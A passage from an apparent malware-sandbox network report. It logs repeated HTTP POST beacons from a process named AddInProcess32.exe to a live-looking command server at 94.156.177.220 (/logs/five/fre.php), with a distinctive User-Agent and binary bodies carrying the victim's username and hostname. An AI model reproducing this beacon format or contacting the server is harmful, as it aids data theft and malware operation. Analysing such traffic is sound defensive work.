                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.224920294.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:35.826720953 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:35.832084894 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:36.783468008 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.224920394.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:37.008929014 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:37.014681101 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:37.966773033 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:37 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.224920494.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:38.143923044 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:38.149338007 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:39.114550114 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.224920594.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:39.254206896 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:39.259708881 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:40.223529100 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.224920694.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:40.373372078 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:40.378742933 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:41.328737974 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.224920794.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:41.474076033 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:41.479513884 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:42.424623966 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.224920894.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:42.558991909 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:42.564512968 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:43.523212910 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.224920994.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:43.673996925 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:43.679805994 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:44.625430107 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:44 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.224921094.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:45.029531956 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:45.035156965 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:45.984025002 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:45 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.224921194.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:46.135194063 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:46.148099899 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:47.107070923 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.224921294.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:47.872925043 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:47.878298044 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:48.810715914 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.224921394.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:49.163932085 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:49.169375896 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:50.129101992 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:49 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.224921494.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:50.268229008 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:50.273713112 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:51.214497089 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.224921594.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:51.362858057 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:51.369260073 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:52.324593067 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.224921694.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:52.480187893 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:52.485585928 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:53.452478886 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.224921794.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:53.618575096 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:53.624164104 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:54.556412935 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.224921894.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:54.749501944 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: F0B98DE8
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Oct 24, 2024 08:46:54.754980087 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.ruAlbus040965ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                    Oct 24, 2024 08:46:55.732450962 CEST236INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Thu, 24 Oct 2024 06:46:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 23
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Status: 404 Not Found
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.224921994.156.177.220803496C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Oct 24, 2024 08:46:55.930401087 CEST244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.220
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
